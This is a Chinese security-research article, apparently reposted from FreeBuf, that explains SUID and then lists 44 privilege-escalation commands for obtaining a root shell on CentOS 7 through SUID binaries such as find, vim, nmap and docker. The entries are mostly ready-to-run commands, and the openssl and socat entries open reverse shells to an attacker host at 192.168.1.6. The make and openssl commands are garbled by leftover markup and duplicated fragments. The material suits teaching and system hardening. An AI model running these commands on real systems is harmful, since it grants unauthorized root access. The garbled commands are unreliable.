安全研究 | CentOS 7系统利用suid提权获取Root Shell

Posted FreeBuf

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了安全研究 | CentOS 7系统利用suid提权获取Root Shell相关的知识,希望对你有一定的参考价值。

一、操作目的和应用场景

本文档介绍在CentOS 7系统中利用带有suid权限的程序提权从而获取root shell的方法。

首先简单介绍suid的概念:

Linux进程在运行的时候有以下三个UID:

Real UID:执行该进程的用户的UID。Real UID只用于标识用户,不用于权限检查。

Effective UID(EUID):进程执行时生效的UID。在对访问目标进行操作时,系统会检查EUID是否有权限。一般情况下,Real UID与EUID相同,但在运行设置了SUID权限的程序时,进程的EUID会被设置为程序文件属主的UID。

Saved UID:在高权限用户降权后,保留的UID。

进程的GID与UID情况类似。

CentOS系统中存在可执行程序/bin/cat,属主属组均为root,任何用户对其都拥有执行权限。另外存在系统文件/etc/shadow,属主属组也都是root,不提供任何访问权限。

假设系统中存在一个普通用户,名为user1,UID和GID都是1000。该用户对/bin/cat具有执行权限,对/etc/shadow不具有任何权限。默认情况下,user1执行/bin/cat,系统会创建一个cat进程,进程的Real UID和Effective UID相同,都是运行该进程的user1用户的UID(1000)。cat进程访问/etc/shadow,由于进程的EUID不具备任何访问权限,所以系统会拒绝其访问目标。

为/bin/cat设置SUID权限之后,user1创建的cat进程的Effective UID自动被设置为/bin/cat文件的属主的UID值,也就是root的UID:0。这样该进程访问/etc/shadow时,虽然目标文件拒绝任何人访问,但是由于进程的Effective UID为0,具备超级用户权限,可以访问任意文件,所以就可以显示shadow文件的内容了。

如果某个设置了suid权限的程序运行后创建了shell,那么shell进程的EUID也会是这个程序文件属主的UID,也就是说,这是一个root shell。root shell中运行的程序的EUID也都是0,具备超级权限。

为可执行文件添加suid权限的目的是简化操作流程,让普通用户也能做一些高权限才能做的的工作。但是如果SUID配置不当,则很容易造成提权。

二、平台及工具版本

虚拟机:CentOS Linux release 7.8.2003 (Core)

三、操作步骤

(一)suid/sgid权限设置

chmod u+s prog1  //设置prog1的suid权限

chmod g+s prog2  //设置prog2的sgid权限

(二)查找带有suid/sgid权限的文件

find / -perm -u=s -type f 2>/dev/null  //查找suid文件

find / -perm -g=s -type f 2>/dev/null  //查找sgid文件

现在我们假设,后面介绍的用于提权的程序文件都被root用户设置了suid权限,我们搜索到这些文件后开始提权。

(三)提权

1、awk

输入下面的命令进行提权:

awk ‘BEGIN {system(“/bin/bash -p”)}’

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

2、bash

输入下面的命令进行提权:

bash -p

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

3、csh

输入下面的命令进行提权:

csh -b

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

4、dmesg

输入下面的命令进行提权:

dmesg -H

!/bin/sh -p

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

5、docker

输入下面的命令进行提权:

docker run -v /:/mnt —rm -it alpine chroot /mnt sh

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

6、ed

输入下面的命令进行提权:

ed

!/bin/sh -p

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

7、env

输入下面的命令进行提权:

env /bin/sh -p

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

8、expect

输入下面的命令进行提权:

expect -c ‘spawn /bin/sh -p;interact’

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

9、find

输入下面的命令进行提权:

find . -exec /bin/sh -p ; -quit

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

10、flock

输入下面的命令进行提权:

flock -u / /bin/sh -p

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

11、ftp

输入下面的命令进行提权:

ftp

!/bin/sh -p

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

12、gdb

输入下面的命令进行提权:

gdb -nx -ex ‘python import os; os.execl(“/bin/sh”, “sh”, “-p”)’ -ex quit

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

13、gimp

输入下面的命令进行提权:

gimp -idf —batch-interpreter=python-fu-eval -b ‘import os; os.execl(“/bin/sh”, “sh”, “-p”)’

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

14、git

输入下面的命令进行提权:

git help status  //在底行输入“!/bin/sh -p”

安全研究 | CentOS 7系统利用suid提权获取Root Shell

回车后得到shell:

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

15、 ionice

输入下面的命令进行提权:

ionice /bin/sh -p

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

16、ip

输入下面的命令进行提权:

ip netns add foo

ip netns exec foo /bin/sh -p

ip netns delete foo

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

17、 ksh

输入下面的命令进行提权:

ksh -p

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

18、less

输入下面的命令进行提权:

less /etc/profile  //读取文件,在底行输入!/bin/sh -p

安全研究 | CentOS 7系统利用suid提权获取Root Shell

回车后进入新的shell

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

19、logsave

输入下面的命令进行提权:

logsave /dev/null /bin/sh -i -p

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

20、make

输入下面的命令进行提权:

COMMAND=’/bin/sh -p’

make -s —eval=<img alt="'x: -'" "="">COMMAND”

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

21、man

man man  //在底行输入”!/bin/sh -p”

安全研究 | CentOS 7系统利用suid提权获取Root Shell

回车后得到shell:

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

22、more

输入下面的命令进行提权:

more /etc/profile

!/bin/sh -p

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

23、 nano

输入下面的命令进行提权:

nano  //运行nano程序

^R  //按下ctrl-r

^X  //按下ctrl-x

reset; sh -p 1>&0 2>&0  //输入下面的命令

安全研究 | CentOS 7系统利用suid提权获取Root Shell

在nano的shell中无法显示命令内容,但是可以看到命令的结果。

提权成功,得到了root shell。

24、nice

输入下面的命令进行提权:

nice /bin/sh -p

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

25、nmap

输入下面的命令进行提权:

echo “os.execute(‘/bin/bash -p’)” > /tmp/shell.nse

nmap —script=/tmp/shell.nse 127.0.0.1

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

26、 openssl

输入下面的命令进行提权:

首先在攻击者的机器上运行下面的命令以接收连接:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

openssl s_server -quiet -key key.pem -cert cert.pem -port 12345

安全研究 | CentOS 7系统利用suid提权获取Root Shell

之后在CentOS服务器上执行下面的命令:

RHOST=192.168.1.6

RPORT=12345

mkfifo /tmp/s; /bin/sh -p -i < /tmp/s 2>&1 | openssl s_client -quiet -no_ign_eof -connect&1 | openssl s_client -quiet -no_ign_eof -connect $RPORT > /tmp/s; rm /tmp/s

安全研究 | CentOS 7系统利用suid提权获取Root Shell

攻击者收到反弹的shell:

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

27、 php

输入下面的命令进行提权:

CMD=”/bin/sh”

php -r “pcntl_exec(‘/bin/sh’, [‘-p’]);”

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

28、 python

输入下面的命令进行提权:

python -c ‘import os; os.execl(“/bin/sh”, “sh”, “-p”)’

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

29、 rpm

输入下面的命令进行提权:

rpm —eval ‘%{lua:os.execute(“/bin/sh -p”)}’

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

30、 rsync

输入下面的命令进行提权:

rsync -e ‘sh -p -c “sh -p 0<&2 1>&2”‘ 127.0.0.1:/dev/null

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

31、rvim

输入下面的命令进行提权:

rvim -c ‘:py import os; os.execl(“/bin/sh”, “sh”, “-pc”, “reset; exec sh -p”)’

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

32、 setarch

输入下面的命令进行提权:

setarch $(arch) /bin/sh -p

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

33、socat

输入下面的命令进行提权:

攻击者首先在自己的计算机启动对TCP 8888端口的监听

socat file:’/dev/tty’,raw,echo=0 tcp-listen:8888

服务器通过socat发起连接:

socat tcp-connect:192.168.1.6:8888 exec:’/bin/sh -p’,pty,stderr

攻击者得到shell:

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

34、ssh

输入下面的命令进行提权:

ssh -o ProxyCommand=’;sh -p 0<&2 1>&2’ x

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

35、 strace

输入下面的命令进行提权:

strace -o /dev/null /bin/sh -p

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

36、stdbuf

输入下面的命令进行提权:

stdbuf -i0 /bin/sh -p

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

37、taskset

输入下面的命令进行提权:

taskset 1 /bin/sh -p

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

38、tclsh

输入下面的命令进行提权:

tclsh

exec /bin/sh -p <@stdin >@stdout 2>@stderr

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

39、time

输入下面的命令进行提权:

time /bin/sh -p

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

40、timeout

输入下面的命令进行提权:

timeout 7d /bin/sh -p

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

41、vim

输入下面的命令进行提权:

vim -c ‘:py import os; os.execl(“/bin/sh”, “sh”, “-pc”, “reset; exec sh -p”)’

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

42、watch

输入下面的命令进行提权:

watch -x sh -c ‘reset; exec sh -p 1>&0 2>&0’

安全研究 | CentOS 7系统利用suid提权获取Root Shell

无法显示执行的命令,但是可以看到执行结果。

提权成功,得到了root shell。

43、xargs

输入下面的命令进行提权:

xargs -a /dev/null sh -p

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

44、zsh

输入下面的命令进行提权:

zsh

安全研究 | CentOS 7系统利用suid提权获取Root Shell

提权成功,得到了root shell。

四、总结

本文档仅用于研究目的,请勿用于非法用途。

安全研究 | CentOS 7系统利用suid提权获取Root Shell

安全研究 | CentOS 7系统利用suid提权获取Root Shell 交易担保 FreeBuf+ FreeBuf+小程序:把安全装进口袋

精彩推荐





以上是关于安全研究 | CentOS 7系统利用suid提权获取Root Shell的主要内容,如果未能解决你的问题,请参考以下文章

SUID提权:CVE-2021-4034漏洞全解析

Linux提权思路

Web安全入门与靶场实战(32)- 利用find提权

Linux提权第三篇-GNU C Library动态链接库$ORIGIN溢出提权

CentOS7 Sudo本地提权漏洞修复实践

记一次Linux安全提权总结